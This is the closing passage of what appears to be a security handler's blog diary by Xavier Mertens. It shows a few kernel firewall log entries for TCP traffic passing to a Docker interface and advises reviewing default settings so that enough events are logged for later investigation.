MAC=02:42:c6:a7:b3:f2:02:42:ac:11:00:04:08:00 SRC= DST= LEN=52 TOS=0x00 \
​PREC=0x00 TTL=63 ID=15759 DF PROTO=TCP SPT=41017 DPT=25 WINDOW=229 RES=0x00 ACK URGP=0 

Jun  1 20:59:10 inception kernel: [8417805.742798] IN=eth0 OUT=docker0 \
MAC=c2:41:32:db:26:fc:00:00:24:d0:69:51:08:00 SRC= DST= LEN=140 TOS=0x18 \
PREC=0x20 TTL=117 ID=7085 DF PROTO=TCP SPT=50424 DPT=2222 WINDOW=512 RES=0x00 ACK PSH URGP=0

In many applications and products, the default settings lack of proper logging. Be sure sure to review the settings to generate enough events to investigate later! Happy hunting...

Xavier Mertens
ISC Handler - Freelance Security Consultant